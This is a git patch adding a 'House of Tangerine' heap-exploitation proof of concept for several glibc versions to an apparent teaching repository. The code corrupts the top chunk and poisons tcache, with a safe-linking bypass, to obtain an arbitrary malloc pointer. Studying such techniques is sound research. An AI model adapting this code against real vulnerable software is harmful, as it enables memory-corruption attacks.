From 39ecc170f5e1e2f2df45624636d9f809e5a0bcb4 Mon Sep 17 00:00:00 2001 From: Kyle Zeng Date: Tue, 16 Apr 2024 22:10:36 -0700 Subject: [PATCH] enable house_of_tangerine --- Makefile | 18 ++-- glibc_2.32/house_of_tangerine.c | 161 ++++++++++++++++++++++++++++++++ glibc_2.33/house_of_tangerine.c | 161 ++++++++++++++++++++++++++++++++ glibc_2.35/house_of_tangerine.c | 161 ++++++++++++++++++++++++++++++++ glibc_2.36/house_of_tangerine.c | 161 ++++++++++++++++++++++++++++++++ glibc_2.37/house_of_tangerine.c | 161 ++++++++++++++++++++++++++++++++ glibc_2.38/house_of_tangerine.c | 161 ++++++++++++++++++++++++++++++++ 7 files changed, 975 insertions(+), 9 deletions(-) create mode 100644 glibc_2.32/house_of_tangerine.c create mode 100644 glibc_2.33/house_of_tangerine.c create mode 100644 glibc_2.35/house_of_tangerine.c create mode 100644 glibc_2.36/house_of_tangerine.c create mode 100644 glibc_2.37/house_of_tangerine.c create mode 100644 glibc_2.38/house_of_tangerine.c diff --git a/Makefile b/Makefile index 7a51557..27bfc2e 100644 --- a/Makefile +++ b/Makefile @@ -1,15 +1,15 @@ BASE = malloc_playground first_fit calc_tcache_idx V2.23 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack house_of_einherjar house_of_force house_of_gods house_of_lore house_of_mind_fastbin house_of_orange house_of_roman house_of_spirit house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks overlapping_chunks_2 poison_null_byte unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack sysmalloc_int_free V2.24 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack house_of_einherjar house_of_force house_of_gods house_of_lore house_of_mind_fastbin house_of_roman house_of_spirit house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks overlapping_chunks_2 poison_null_byte unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack sysmalloc_int_free -V2.27 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_force house_of_lore house_of_mind_fastbin house_of_spirit house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack sysmalloc_int_free -V2.31 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink sysmalloc_int_free -V2.32 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free -V2.33 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free -V2.34 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free -V2.35 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free -V2.36 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free -V2.37 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free -V2.38 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free +V2.27 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_force house_of_lore house_of_mind_fastbin house_of_spirit house_of_storm large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink unsorted_bin_attack unsorted_bin_into_stack sysmalloc_int_free house_of_tangerine +V2.31 = fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink sysmalloc_int_free house_of_tangerine +V2.32 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine +V2.33 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine +V2.34 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine +V2.35 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine +V2.36 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine +V2.37 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine +V2.38 = decrypt_safe_linking fastbin_dup fastbin_dup_consolidate fastbin_dup_into_stack fastbin_reverse_into_tcache house_of_botcake house_of_einherjar house_of_lore house_of_mind_fastbin house_of_spirit large_bin_attack mmap_overlapping_chunks overlapping_chunks poison_null_byte tcache_house_of_spirit tcache_poisoning tcache_stashing_unlink_attack unsafe_unlink safe_link_double_protect house_of_water sysmalloc_int_free house_of_tangerine # turn technique names into paths VV2.23 = $(addprefix glibc_2.23/, $(V2.23)) diff --git a/glibc_2.32/house_of_tangerine.c b/glibc_2.32/house_of_tangerine.c new file mode 100644 index 0000000..fe789a2 --- /dev/null +++ b/glibc_2.32/house_of_tangerine.c @@ -0,0 +1,161 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN 0x10L +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// size used for poisoned tcache +#define CHUNK_SIZE_1 0x40 +#define SIZE_1 (CHUNK_SIZE_1-CHUNK_HDR_SZ) + +// could also be split into multiple lower size allocations +#define CHUNK_SIZE_3 (PAGESIZE-(2*MALLOC_ALIGN)-CHUNK_SIZE_1) +#define SIZE_3 (CHUNK_SIZE_3-CHUNK_HDR_SZ) + +/** + * Tested on GLIBC 2.34 (x86_64, x86 & aarch64) & 2.39 (x86_64, x86 & aarch64) + * + * House of Tangerine is the modernized version of House of Orange + * and is able to corrupt heap without needing to call free() directly + * + * it uses the _int_free call to the top_chunk (wilderness) in sysmalloc + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * tcache-poisoning is used to trick malloc into returning a malloc aligned arbitrary pointer + * by abusing the tcache freelist. (requires heap leak on and after 2.32) + * + * this version expects a positive and negative OOB (e.g. BOF) + * or a positive OOB in editing a previous chunk + * + * This version requires 5 (6*) malloc calls and 3 OOB + * + * *to make the PoC more reliable we need to malloc and probe the current top chunk size, + * this should be predictable in an actual exploit and therefore, can be removed to get 5 malloc calls instead + * + * Special Thanks to pepsipu for creating the challenge "High Frequency Trading" + * from Pico CTF 2024 that inspired this exploitation technique + */ +int main() { + size_t size_2, *top_size_ptr, top_size, new_top_size, freed_top_size, vuln_tcache, target, *heap_ptr; + char win[0x10] = "WIN\0WIN\0WIN\0\x06\xfe\x1b\xe2"; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_SIZE_1 & MALLOC_MASK) == CHUNK_SIZE_1); + assert((CHUNK_SIZE_3 & MALLOC_MASK) == CHUNK_SIZE_3); + + puts("Constants:"); + printf("chunk header = 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align = 0x%lx\n", MALLOC_ALIGN); + printf("page align = 0x%lx\n", PAGESIZE); + printf("fencepost size = 0x%lx\n", FENCEPOST); + printf("size_1 = 0x%lx\n", SIZE_1); + + printf("target tcache top size = 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1); + + // target is malloc aligned 0x10 + target = ((size_t) win + (MALLOC_ALIGN - 1)) & MALLOC_MASK; + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + heap_ptr = malloc(PROBE); + top_size = heap_ptr[(PROBE / SIZE_SZ) + 1]; + printf("first top size = 0x%lx\n", top_size); + + // calculate size_2 + + size_2 = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_SIZE_1; + size_2 &= PAGE_MASK; + size_2 &= MALLOC_MASK; + + + printf("size_2 = 0x%lx\n", size_2); + + // first allocation + heap_ptr = malloc(size_2); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &heap_ptr[(size_2 / SIZE_SZ) - 1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("first top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("new first top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_SIZE_1); + + /* + * malloc (larger than available_top_size), to free previous top_chunk using _int_free. + * This happens inside sysmalloc, where the top_chunk gets freed if it can't be merged + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * we prevent the top_chunk from being merged by lowering its size + * we can also circumvent corruption checks by keeping PAGE_MASK bits unchanged + */ + + printf("size_3 = 0x%lx\n", SIZE_3); + heap_ptr = malloc(SIZE_3); + + top_size = heap_ptr[(SIZE_3 / SIZE_SZ) + 1]; + printf("current top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + new_top_size = top_size & PAGE_MASK; + heap_ptr[(SIZE_3 / SIZE_SZ) + 1] = new_top_size; + printf("new top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + printf("freed top_chunk size = 0x%lx\n", freed_top_size); + + assert(freed_top_size == CHUNK_SIZE_1); + + // this will be our vuln_tcache for tcache poisoning + vuln_tcache = (size_t) &heap_ptr[(SIZE_3 / SIZE_SZ) + 2]; + + printf("tcache next ptr: 0x%lx\n", vuln_tcache); + + // free the previous top_chunk + heap_ptr = malloc(SIZE_3); + + // corrupt next ptr into pointing to target + // use a heap leak to bypass safe linking (GLIBC >= 2.32) + heap_ptr[(vuln_tcache - (size_t) heap_ptr) / SIZE_SZ] = target ^ (vuln_tcache >> 12); + + // allocate first tcache (corrupt next tcache bin) + heap_ptr = malloc(SIZE_1); + + // get arbitrary ptr for reads or writes + heap_ptr = malloc(SIZE_1); + + // proof that heap_ptr now points to the same string as target + assert((size_t) heap_ptr == target); + puts((char *) heap_ptr); +} diff --git a/glibc_2.33/house_of_tangerine.c b/glibc_2.33/house_of_tangerine.c new file mode 100644 index 0000000..fe789a2 --- /dev/null +++ b/glibc_2.33/house_of_tangerine.c @@ -0,0 +1,161 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN 0x10L +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// size used for poisoned tcache +#define CHUNK_SIZE_1 0x40 +#define SIZE_1 (CHUNK_SIZE_1-CHUNK_HDR_SZ) + +// could also be split into multiple lower size allocations +#define CHUNK_SIZE_3 (PAGESIZE-(2*MALLOC_ALIGN)-CHUNK_SIZE_1) +#define SIZE_3 (CHUNK_SIZE_3-CHUNK_HDR_SZ) + +/** + * Tested on GLIBC 2.34 (x86_64, x86 & aarch64) & 2.39 (x86_64, x86 & aarch64) + * + * House of Tangerine is the modernized version of House of Orange + * and is able to corrupt heap without needing to call free() directly + * + * it uses the _int_free call to the top_chunk (wilderness) in sysmalloc + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * tcache-poisoning is used to trick malloc into returning a malloc aligned arbitrary pointer + * by abusing the tcache freelist. (requires heap leak on and after 2.32) + * + * this version expects a positive and negative OOB (e.g. BOF) + * or a positive OOB in editing a previous chunk + * + * This version requires 5 (6*) malloc calls and 3 OOB + * + * *to make the PoC more reliable we need to malloc and probe the current top chunk size, + * this should be predictable in an actual exploit and therefore, can be removed to get 5 malloc calls instead + * + * Special Thanks to pepsipu for creating the challenge "High Frequency Trading" + * from Pico CTF 2024 that inspired this exploitation technique + */ +int main() { + size_t size_2, *top_size_ptr, top_size, new_top_size, freed_top_size, vuln_tcache, target, *heap_ptr; + char win[0x10] = "WIN\0WIN\0WIN\0\x06\xfe\x1b\xe2"; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_SIZE_1 & MALLOC_MASK) == CHUNK_SIZE_1); + assert((CHUNK_SIZE_3 & MALLOC_MASK) == CHUNK_SIZE_3); + + puts("Constants:"); + printf("chunk header = 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align = 0x%lx\n", MALLOC_ALIGN); + printf("page align = 0x%lx\n", PAGESIZE); + printf("fencepost size = 0x%lx\n", FENCEPOST); + printf("size_1 = 0x%lx\n", SIZE_1); + + printf("target tcache top size = 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1); + + // target is malloc aligned 0x10 + target = ((size_t) win + (MALLOC_ALIGN - 1)) & MALLOC_MASK; + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + heap_ptr = malloc(PROBE); + top_size = heap_ptr[(PROBE / SIZE_SZ) + 1]; + printf("first top size = 0x%lx\n", top_size); + + // calculate size_2 + + size_2 = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_SIZE_1; + size_2 &= PAGE_MASK; + size_2 &= MALLOC_MASK; + + + printf("size_2 = 0x%lx\n", size_2); + + // first allocation + heap_ptr = malloc(size_2); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &heap_ptr[(size_2 / SIZE_SZ) - 1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("first top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("new first top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_SIZE_1); + + /* + * malloc (larger than available_top_size), to free previous top_chunk using _int_free. + * This happens inside sysmalloc, where the top_chunk gets freed if it can't be merged + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * we prevent the top_chunk from being merged by lowering its size + * we can also circumvent corruption checks by keeping PAGE_MASK bits unchanged + */ + + printf("size_3 = 0x%lx\n", SIZE_3); + heap_ptr = malloc(SIZE_3); + + top_size = heap_ptr[(SIZE_3 / SIZE_SZ) + 1]; + printf("current top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + new_top_size = top_size & PAGE_MASK; + heap_ptr[(SIZE_3 / SIZE_SZ) + 1] = new_top_size; + printf("new top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + printf("freed top_chunk size = 0x%lx\n", freed_top_size); + + assert(freed_top_size == CHUNK_SIZE_1); + + // this will be our vuln_tcache for tcache poisoning + vuln_tcache = (size_t) &heap_ptr[(SIZE_3 / SIZE_SZ) + 2]; + + printf("tcache next ptr: 0x%lx\n", vuln_tcache); + + // free the previous top_chunk + heap_ptr = malloc(SIZE_3); + + // corrupt next ptr into pointing to target + // use a heap leak to bypass safe linking (GLIBC >= 2.32) + heap_ptr[(vuln_tcache - (size_t) heap_ptr) / SIZE_SZ] = target ^ (vuln_tcache >> 12); + + // allocate first tcache (corrupt next tcache bin) + heap_ptr = malloc(SIZE_1); + + // get arbitrary ptr for reads or writes + heap_ptr = malloc(SIZE_1); + + // proof that heap_ptr now points to the same string as target + assert((size_t) heap_ptr == target); + puts((char *) heap_ptr); +} diff --git a/glibc_2.35/house_of_tangerine.c b/glibc_2.35/house_of_tangerine.c new file mode 100644 index 0000000..fe789a2 --- /dev/null +++ b/glibc_2.35/house_of_tangerine.c @@ -0,0 +1,161 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN 0x10L +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// size used for poisoned tcache +#define CHUNK_SIZE_1 0x40 +#define SIZE_1 (CHUNK_SIZE_1-CHUNK_HDR_SZ) + +// could also be split into multiple lower size allocations +#define CHUNK_SIZE_3 (PAGESIZE-(2*MALLOC_ALIGN)-CHUNK_SIZE_1) +#define SIZE_3 (CHUNK_SIZE_3-CHUNK_HDR_SZ) + +/** + * Tested on GLIBC 2.34 (x86_64, x86 & aarch64) & 2.39 (x86_64, x86 & aarch64) + * + * House of Tangerine is the modernized version of House of Orange + * and is able to corrupt heap without needing to call free() directly + * + * it uses the _int_free call to the top_chunk (wilderness) in sysmalloc + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * tcache-poisoning is used to trick malloc into returning a malloc aligned arbitrary pointer + * by abusing the tcache freelist. (requires heap leak on and after 2.32) + * + * this version expects a positive and negative OOB (e.g. BOF) + * or a positive OOB in editing a previous chunk + * + * This version requires 5 (6*) malloc calls and 3 OOB + * + * *to make the PoC more reliable we need to malloc and probe the current top chunk size, + * this should be predictable in an actual exploit and therefore, can be removed to get 5 malloc calls instead + * + * Special Thanks to pepsipu for creating the challenge "High Frequency Trading" + * from Pico CTF 2024 that inspired this exploitation technique + */ +int main() { + size_t size_2, *top_size_ptr, top_size, new_top_size, freed_top_size, vuln_tcache, target, *heap_ptr; + char win[0x10] = "WIN\0WIN\0WIN\0\x06\xfe\x1b\xe2"; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_SIZE_1 & MALLOC_MASK) == CHUNK_SIZE_1); + assert((CHUNK_SIZE_3 & MALLOC_MASK) == CHUNK_SIZE_3); + + puts("Constants:"); + printf("chunk header = 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align = 0x%lx\n", MALLOC_ALIGN); + printf("page align = 0x%lx\n", PAGESIZE); + printf("fencepost size = 0x%lx\n", FENCEPOST); + printf("size_1 = 0x%lx\n", SIZE_1); + + printf("target tcache top size = 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_SIZE_1); + + // target is malloc aligned 0x10 + target = ((size_t) win + (MALLOC_ALIGN - 1)) & MALLOC_MASK; + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + heap_ptr = malloc(PROBE); + top_size = heap_ptr[(PROBE / SIZE_SZ) + 1]; + printf("first top size = 0x%lx\n", top_size); + + // calculate size_2 + + size_2 = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_SIZE_1; + size_2 &= PAGE_MASK; + size_2 &= MALLOC_MASK; + + + printf("size_2 = 0x%lx\n", size_2); + + // first allocation + heap_ptr = malloc(size_2); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &heap_ptr[(size_2 / SIZE_SZ) - 1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("first top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("new first top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_SIZE_1); + + /* + * malloc (larger than available_top_size), to free previous top_chunk using _int_free. + * This happens inside sysmalloc, where the top_chunk gets freed if it can't be merged + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * we prevent the top_chunk from being merged by lowering its size + * we can also circumvent corruption checks by keeping PAGE_MASK bits unchanged + */ + + printf("size_3 = 0x%lx\n", SIZE_3); + heap_ptr = malloc(SIZE_3); + + top_size = heap_ptr[(SIZE_3 / SIZE_SZ) + 1]; + printf("current top size = 0x%lx\n", top_size); + + // make sure corrupt top size is page aligned, generally 0x1000 + new_top_size = top_size & PAGE_MASK; + heap_ptr[(SIZE_3 / SIZE_SZ) + 1] = new_top_size; + printf("new top size = 0x%lx\n", new_top_size); + + // remove fencepost from top_chunk, to get size that will be freed + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + printf("freed top_chunk size = 0x%lx\n", freed_top_size); + + assert(freed_top_size == CHUNK_SIZE_1); + + // this will be our vuln_tcache for tcache poisoning + vuln_tcache = (size_t) &heap_ptr[(SIZE_3 / SIZE_SZ) + 2]; + + printf("tcache next ptr: 0x%lx\n", vuln_tcache); + + // free the previous top_chunk + heap_ptr = malloc(SIZE_3); + + // corrupt next ptr into pointing to target + // use a heap leak to bypass safe linking (GLIBC >= 2.32) + heap_ptr[(vuln_tcache - (size_t) heap_ptr) / SIZE_SZ] = target ^ (vuln_tcache >> 12); + + // allocate first tcache (corrupt next tcache bin) + heap_ptr = malloc(SIZE_1); + + // get arbitrary ptr for reads or writes + heap_ptr = malloc(SIZE_1); + + // proof that heap_ptr now points to the same string as target + assert((size_t) heap_ptr == target); + puts((char *) heap_ptr); +} diff --git a/glibc_2.36/house_of_tangerine.c b/glibc_2.36/house_of_tangerine.c new file mode 100644 index 0000000..fe789a2 --- /dev/null +++ b/glibc_2.36/house_of_tangerine.c @@ -0,0 +1,161 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN 0x10L +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// size used for poisoned tcache +#define CHUNK_SIZE_1 0x40 +#define SIZE_1 (CHUNK_SIZE_1-CHUNK_HDR_SZ) + +// could also be split into multiple lower size allocations +#define CHUNK_SIZE_3 (PAGESIZE-(2*MALLOC_ALIGN)-CHUNK_SIZE_1) +#define SIZE_3 (CHUNK_SIZE_3-CHUNK_HDR_SZ) + +/** + * Tested on GLIBC 2.34 (x86_64, x86 & aarch64) & 2.39 (x86_64, x86 & aarch64) + * + * House of Tangerine is the modernized version of House of Orange + * and is able to corrupt heap without needing to call free() directly + * + * it uses the _int_free call to the top_chunk (wilderness) in sysmalloc + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * tcache-poisoning is used to trick malloc into returning a malloc aligned arbitrary pointer + * by abusing the tcache freelist. (requires heap leak on and after 2.32) + * + * this version expects a positive and negative OOB (e.g. BOF) + * or a positive OOB in editing a previous chunk + * + * This version requires 5 (6*) malloc calls and 3 OOB + * + * *to make the PoC more reliable we need to malloc and probe the current top chunk size, + * this should be predictable in an actual exploit and therefore, can be removed to get 5 malloc calls instead + * + * Special Thanks to pepsipu for creating the challenge "High Frequency Trading" + * from Pico CTF 2024 that inspired this exploitation technique + */ +int main() { + size_t size_2, *top_size_ptr, top_size, new_top_size, freed_top_size, vuln_tcache, target, *heap_ptr; + char win[0x10] = "WIN\0WIN\0WIN\0\x06\xfe\x1b\xe2"; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_SIZE_1 & MALLOC_MASK) == CHUNK_SIZE_1); + assert((CHUNK_SIZE_3 & MALLOC_MASK) == CHUNK_SIZE_3); + + puts("Constants:"); + printf("chunk header = 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc 